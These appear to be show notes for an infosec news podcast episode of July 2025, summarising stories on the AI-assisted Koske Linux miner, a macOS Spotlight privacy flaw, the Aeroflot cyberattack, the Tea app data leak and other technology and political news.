Dark mode: ON

Infosec Decoded Season 5 #59: AI-Generated Malware

With Doug Spindler and sambowne@infosec.exchange

Recorded Tue, July 29, 2025

AI

AI-Generated Linux Miner 'Koske' Beats Human Malware
Koske uses layer upon layer of tricks to establish persistence and concealment in a target's system. It installs a rootkit, schedules cron jobs, and alters Linux startup files to ensure it starts upon any system reboot.

It was apparently developed with AI, so it has an impressive array of troubleshooting methods to connect to its C2 infrastructure: resetting and changing proxy and domain name system (DNS) settings, erasing firewall rules, etc.

Koske Malware Hides in Panda Images, Weaponizes AI to Target Linux
Koske uses stealth rootkits to hide its files, processes, and even its own presence from system monitoring tools. It establishes persistence through cron jobs, modifications to .bashrc and .bash_logout, and even creates custom systemd services. Its connectivity module is capable of proxy discovery and failover, giving it resilience in varied network conditions—a hallmark of AI-generated logic.

Security researchers have flagged verbose, modular code structures, well-commented logic, and defensive programming patterns as signs that large language models (LLMs) played a role in writing Koske. This points to a disturbing new frontier: the rise of AI-generated malware that can learn, adapt, and hide better than anything seen before.

Microsoft: macOS Sploitlight flaw leaks Apple Intelligence data
Apple's Transparency, Consent, and Control (TCC) is a security feature that blocks apps from accessing private user data--it requires users to allow access in Systen Settings for each app. This Sploitlight attack uses the privileged access of Spotlight plugins to access sensitive files and steal their contents.

This includes, but is not limited to, photo and video metadata, precise geolocation data, face and person recognition data, user activity and event context, photo albums and shared libraries, search history and user preferences, as well as deleted photos and videos.

Apple has fixed the security flaw in patches released in March for macOS Sequoia 15.4 with "improved data redaction."

How Anthropic teams use Claude Code
While many of their use cases were predictable—debugging, navigating codebases, managing workflows—others surprised us. Lawyers built phone tree systems. Marketers generated hundreds of ad variations in seconds. Data scientists created complex visualizations without knowing JavaScript.

The pattern became clear: agentic coding isn't just accelerating traditional development. It's dissolving the boundary between technical and non-technical work, turning anyone who can describe a problem into someone who can build a solution.

Politics

Trump admin. is muffling CDC’s flagship health journal, report finds
Scientific articles must now obtain clearance for publication from health secretary and anti-vaccine activist Robert F. Kennedy Jr.—who has no health, science, or medical background. A spokesperson for the Department of Health and Human Services disputed this claim, calling it "false."
Nude women streamed to office TV derail Oklahoma Board of Education meeting
How the Trump FCC justified requiring a “bias monitor” at CBS

Infosec

Another Google Pixel 6a catches fire after battery-nerfing update
In early July, Google's monthly Pixel patch included a major change for the Pixel 6a. Due to the risk of battery fires, Google said that devices with more than 400 charge cycles could see their capacity and charging speed drastically reduced. But in at least one case, even this heavy-handed update wasn't enough—a user has reported their up-to-date Pixel 6a recently exploded overnight.
Video: China unleashes ‘world’s fastest’ humanoid robot that dances, packs parcels
The full-sized humanoid, which is 5.7 feet (175 cm) tall, is now the fastest humanoid robot, capable of sprinting up to 14.4 km/h (9 mph). The L7, created for visually striking demonstrations and real-world uses, is capable of industrial chores like sorting, scanning, and handling power tools and athletic exploits like 360-degree spins and breakdancing.
Neuralink helps paralysed woman write her name after 20 years
She is the first woman in the world to receive the implant. The chip, once inserted, allows users to control digital interfaces through brain signals alone. “She is controlling her computer just by thinking. Most people don’t realise it is possible,” Musk wrote.

“It was brain surgery, they drilled a hole in my skull and placed 128 threads into my motor cortex,” she wrote. “The chip is about the size of a quarter.”

CYBERSTRIKE ON RUSSIAN AEROFLOT!
They destroyed over 7 thousand servers and workstations, causing cancellations of over 100 flights. The network uses Windows XP and 2003, which led to the compromise of their entire infrastructure. Successful penetration is largely due to the fact that some company employees neglect basic password security. So Aeroflot CEO Sergey Aleksandrovsky hasn’t changed his password since 2022.
Tea app leak worsens with second database exposing user chats
The Tea app is a women-only dating safety platform where members can share reviews about men, with access to the platform only granted after providing a selfie and government ID verification.

The Tea app data breach has grown into an even larger leak, with the stolen data now shared on hacking forums and a second database discovered that allegedly contains 1.1 million private messages exchanged between the app's members.

Huawei shows off AI computing system to rival Nvidia's top product
Huawei Technologies showed off an AI computing system on Saturday that one industry expert has said rivals Nvidia's most advanced offering.
Brits can get around Discord's age verification thanks to Death Stranding's photo mode, bypassing the measure introduced with the UK's Online Safety Act. We tried it and it works—thanks, Kojima
Death Stranding is a 2019 action-adventure game. The method requires using a phone for the Discord age verification, opening Death Stranding's Photo Mode, and preparing a close up of Sam Porter, played by one Norman Reedus.